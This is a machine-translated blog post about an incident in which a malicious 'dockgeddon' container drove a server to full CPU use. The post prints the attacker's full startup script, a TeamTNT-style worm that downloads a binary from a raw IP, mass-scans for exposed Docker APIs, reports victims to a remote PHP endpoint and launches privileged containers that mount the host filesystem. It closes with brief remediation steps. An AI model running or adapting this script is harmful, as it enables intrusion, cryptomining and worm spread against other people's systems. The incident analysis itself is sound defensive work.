当前位置:网站首页>Abnormal dockgeddon causes CPU 100%
Abnormal dockgeddon causes CPU 100%
2022-06-24 16:25:00 【Zhanglinxi】
abnormal dockgeddon Lead to cpu 100%
Problem description
1, Receive the nail alarm , Prompt the machine cpu Utilization rate exceeding 90%
2, Then log in to monitor and find the corresponding machine
Is, indeed, CPU The utilization rate has reached 100% .
3, Check container monitoring to determine which container is causing the problem ( Because I am running on this machine docker)
It can also be used without container monitoring docker stats To check the resource consumption of each container .
4, Find the container in question , Discovery is not a container for our business , So I started to analyze
Analyze the problem docker
see docker The start command of , It is found that his startup is to execute an internal script
#!/bin/bash
RATE_TO_SCAN=500000
if type apt-get 2>/dev/null 1>/dev/null; then apt-get update --fix-missing 2>/dev/null 1>/dev/null; apt-get install -y wget curl jq bash masscan libpcap-dev ; fi
if type yum 2>/dev/null 1>/dev/null; then yum clean all 2>/dev/null 1>/dev/null; yum install -y wget curl jq bash masscan libpcap-devel ; fi
if ! type zgrab 2>/dev/null 1>/dev/null; then wget http://45.9.148.85/bin/zgrab -O /usr/bin/zgrab && chmod +x /usr/bin/zgrab ; fi
if ! type docker 2>/dev/null; then curl -sLk https://get.docker.com | bash ; fi
docker stop $(docker ps | grep -v 'CONTAINER' | grep -v 'tntpwner2\|b0rgdrone24\|dockgeddon' | awk '{print $1}')
clear ; echo "" ; echo ""
echo CgoKICAgICAgICBfX19fXyAgICAgICAgICAgICAgICAgICAgX19fX18gICAgX18gIF9fX19fICAgXyBfIF8gICAgICAgICAgICAgIAogICAgICAgL19fICAgXF9fXyAgX18gXyBfIF9fIF9fXy9fXyAgIFwvXCBcIFwvX18gICBcIHwgKF8pIHwgX19fX18gIF9fXyAgCiAgICAgICAgIC8gL1wvIF8gXC8gX2AgfCAnXyBgIF8gXCAvIC9cLyAgXC8gLyAgLyAvXC8gfCB8IHwgfC8gLyBfIFwvIF9ffCAKICAgICAgICAvIC8gfCAgX18vIChffCB8IHwgfCB8IHwgLyAvIC8gL1wgIC8gIC8gLyAgICB8IHwgfCAgIDwgIF9fL1xfXyBcIAogICAgICAgIFwvICAgXF9fX3xcX18sX3xffCB8X3wgfF9cLyAgXF9cIFwvICAgXC8gICAgIHxffF98X3xcX1xfX198fF9fXy8gCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgIF8gICBfICAgICAgICAgICAgICBfX18gIF9fXyAgICBfXyAgICBfX18gICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICB8IHxffCB8X18gICBfX18gICAgLyBfX1wvIF8gXCAgL19fXCAgLyBfIFwgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgIHwgX198ICdfIFwgLyBfIFwgIC9fX1wvLyB8IHwgfC8gXC8vIC8gL19cLyAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgfCB8X3wgfCB8IHwgIF9fLyAvIFwvICBcIHxffCAvIF8gIFwvIC9fXFwgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgXF9ffF98IHxffFxfX198IFxfX19fXy9cX19fL1wvIFxfL1xfX19fLyAgICAgICAgICAgICAgICAgCgoKCgoK | base64 -d
sleep 6
chmod +x /usr/bin/zgrab
chmod +x /root/dockerd
chmod +x /root/TNTfeatB0RG
/root/TNTfeatB0RG
nice -n -20 /root/dockerd || /root/dockerd
dAPIpwn(){
range=$1
port=$2
rate=$3
rndstr=$(head /dev/urandom | tr -dc a-z | head -c 6 ; echo '')
eval "$rndstr"="'$(masscan $range -p$port --rate=$rate | awk '{print $6}'| zgrab --senders 200 --port $port --http='/v1.16/version' --output-file=- 2>/dev/null | grep -E 'ApiVersion|client version 1.16' | jq -r .ip)'";
for ipaddy in ${!rndstr}
do
TARGET=$ipaddy:$port
echo '##################################################'
curl -sLk http://45.9.148.85/input/da.php?vuln=$TARGET -o /dev/null
echo $TARGET
timeout -s SIGKILL 240 docker -H $TARGET run -d --net host --privileged --name dockgeddon -v /:/host mangletmpuser/dockgeddon
done
}
while true
do
RANGE=$(curl -sLk http://45.9.148.85/input/da_range.php)".0.0.0/8"
dAPIpwn $RANGE 2375 $RATE_TO_SCAN
dAPIpwn $RANGE 2376 $RATE_TO_SCAN
dAPIpwn $RANGE 2377 $RATE_TO_SCAN
dAPIpwn $RANGE 4244 $RATE_TO_SCAN
dAPIpwn $RANGE 4243 $RATE_TO_SCAN
doneTake a look at the startup script , I knew my server had been mined by others . Last in Aqua Website blog The corresponding information was found on
Moving blog content
TeamTNT in the light of Docker and Kubernetes The environment has launched a new campaign . By using managed in Docker Hub A set of container images in , An attacker can configure the wrong Docker A daemon ,Kubeflow Dashboard and Weave Scope Position as target , Use these environments to steal cloud credentials , Open the back door , Mining cryptocurrencies and launching a worm . Look for the next victim . In this blog , I will explore these container images and their design uses .
We are hacked because we expose this port to the public network .
terms of settlement
1, delete mirror
2, Shield the sensitive ports above to provide external access
边栏推荐
- Some experiences of project K several operations in the global template
- Some experiences of K project: global template highlights
- Istio FAQ: virtualservice route matching sequence
- Cloud + community [play with Tencent cloud] video solicitation activity winners announced
- Join in ABAP CDs
- Install the imagemagick7.1 library and the imageick extension for PHP
- Ui- first lesson
- Detailed explanation of transpose convolution in pytorch
- Applet - use of template
- MySQL Innodb和Myisam
猜你喜欢

【应用推荐】最近大火的Apifox & Apipost 上手体验与选型建议

Cognition and difference of service number, subscription number, applet and enterprise number (enterprise wechat)

There are potential safety hazards Land Rover recalls some hybrid vehicles
MySQL Advanced Series: locks - locks in InnoDB
Advanced programmers must know and master. This article explains in detail the principle of MySQL master-slave synchronization

One article explains Jackson configuration information in detail

Wechat official account debugging and natapp environment building

微信公众号调试与Natapp环境搭建

Implement Domain Driven Design - use ABP framework - domain logic & application logic

【附下载】汉化版Awvs安装与简单使用
随机推荐
2021-04-18: given a two-dimensional array matrix, the value in it is either 1 or 0,
2021-04-25: given an array arr and a positive number m, the
#夏日挑战赛# HarmonyOS - 实现带日期效果的待办事项
Using alicloud RDS for SQL Server Performance insight to optimize database load - first understanding of performance insight
Some experiences of K project: global template highlights
[go] runtime package for concurrent programming and its common methods
Heavy release! Tencent cloud ASW workflow, visual orchestration cloud service
Problems encountered in the work of product manager
基于STM32的MD5校验
Kubernetes popular series: getting started with container Foundation
Applet wxss
One article explains Jackson configuration information in detail
[application recommendation] the hands-on experience and model selection suggestions of apifox & apipost in the recent fire
CDs view permission check
Interpretation of swin transformer source code
How to easily realize online karaoke room and sing "mountain sea" with Wang Xinling
Some adventurer hybrid versions with potential safety hazards will be recalled
Development trend of CAE simulation analysis software
Istio FAQ: virtualservice route matching sequence
One Minute! No code! Add [statistical analysis] to the website